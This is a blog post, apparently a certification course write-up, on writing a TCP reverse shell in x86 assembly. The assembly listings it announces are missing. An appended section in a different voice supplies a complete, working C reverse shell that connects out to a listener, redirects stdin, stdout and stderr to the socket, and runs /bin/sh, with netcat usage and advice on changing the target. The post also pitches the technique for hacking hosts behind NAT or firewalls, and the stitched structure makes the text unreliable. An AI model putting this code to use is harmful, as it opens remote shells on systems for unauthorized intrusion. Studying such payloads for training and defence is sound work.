And here we go again! This is post two of seven describing my solutions for the SLAE course/certification (TCP Reverse Shell in x86 Assembly language).
Disclaimer:
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-890
All right. This time we develop a TCP Reverse Shell in x86 Assembly language.
The template for the code was the TCP Bind Shell from the previous blog post. I only had to make minor changes to turn it into a reverse shell 😉
As usual you'll find the source code on my github page!
First of all, I had to find a smart (= easy to change later) way to store the connection config parameters (ip and port) in the shellcode, and decided to go a similar way as before, just extending it a bit.
So the last 6 bytes of the shellcode now carry the port (bytes 1 and 2) and the ip address (bytes 3 to 6), both stored in network byte order so they can be copied straight into the sockaddr_in that connect() expects. It looks like this:
Next we create our socket (same as in the bind shell):
We then map the three standard file descriptors STDIN (0), STDOUT (1) and STDERR (2) onto the socket's fd with dup2(), so the shell's input and output travel over the connection.
Looking good. Now the new stuff. We use the socket function connect() to connect to the remote host. Please note the bit of code where we pull the config (ip and port) from the popped config struct (ebp!).
And finally, our old friend execve.
That's it! After setting up a local listener with netcat and running the shellcode, we get a shell served remotely. Because the connection is initiated outbound by the target, this is pretty handy when hacking a system that's behind a NAT or a firewall that blocks inbound connections 🙂
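The whole sequence described above (6-byte config trailer, socket, connect, dup2 of fds 0 to 2, execve) as a C equivalent, added here as an example; this is not the post's assembly and the function names (encode_config, decode_config, reverse_shell) and the listener address 127.0.0.1:4444 are my own assumptions. encode_config also performs the check a practitioner wants before embedding the trailer: it counts NUL bytes, since a port or address containing 0x00 (127.0.0.1 has two) would truncate the shellcode if it is delivered via a string copy.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Build the 6-byte config trailer used by the shellcode:
 * bytes 0-1 = port, bytes 2-5 = IPv4 address, both in network byte order.
 * Returns the number of NUL bytes in the trailer (each one would cut the
 * payload short under strcpy-style delivery), or -1 if ip does not parse. */
int encode_config(unsigned char out[6], uint16_t port, const char *ip)
{
    struct in_addr addr;
    uint16_t nport = htons(port);
    if (inet_pton(AF_INET, ip, &addr) != 1)
        return -1;
    memcpy(out, &nport, 2);
    memcpy(out + 2, &addr, 4);
    int nuls = 0;
    for (int i = 0; i < 6; i++)
        if (out[i] == 0)
            nuls++;
    return nuls;
}

/* Mirror of what the assembly does with the bytes at ebp: turn the trailer
 * into the sockaddr_in that connect() expects. No byte swapping is needed
 * because the trailer is already in network byte order. */
void decode_config(const unsigned char cfg[6], struct sockaddr_in *sa)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    memcpy(&sa->sin_port, cfg, 2);
    memcpy(&sa->sin_addr, cfg + 2, 4);
}

/* socket -> connect -> dup2 x3 -> execve, the same order as the shellcode.
 * Only returns (with -1) if one of the steps fails. */
int reverse_shell(const unsigned char cfg[6])
{
    struct sockaddr_in sa;
    decode_config(cfg, &sa);

    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;
    }
    /* STDIN (0), STDOUT (1), STDERR (2) all go to the socket. */
    for (int i = 0; i <= 2; i++)
        if (dup2(fd, i) < 0) {
            close(fd);
            return -1;
        }
    /* The shellcode uses "/bin//sh" to avoid a NUL byte; plain C can use "/bin/sh". */
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return -1;
}

int main(void)
{
    unsigned char cfg[6];
    /* Assumed listener for this example: 127.0.0.1:4444 (nc -lvnp 4444). */
    int nuls = encode_config(cfg, 4444, "127.0.0.1");
    if (nuls < 0) {
        fprintf(stderr, "bad address\n");
        return 1;
    }
    if (nuls > 0)
        fprintf(stderr, "warning: trailer contains %d NUL byte(s); "
                        "pick another port/address for string-copied delivery\n", nuls);
    if (reverse_shell(cfg) < 0) {
        perror("reverse_shell");
        return 1;
    }
    return 0;
}
```

Start `nc -lvnp 4444` in one terminal, then run the program in another to get the shell at the listener. Swapping in a different target only means changing the two encode_config arguments, which is exactly the property the 6-byte trailer gives the shellcode.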
Thanks for reading! See you in the next assignment blog post.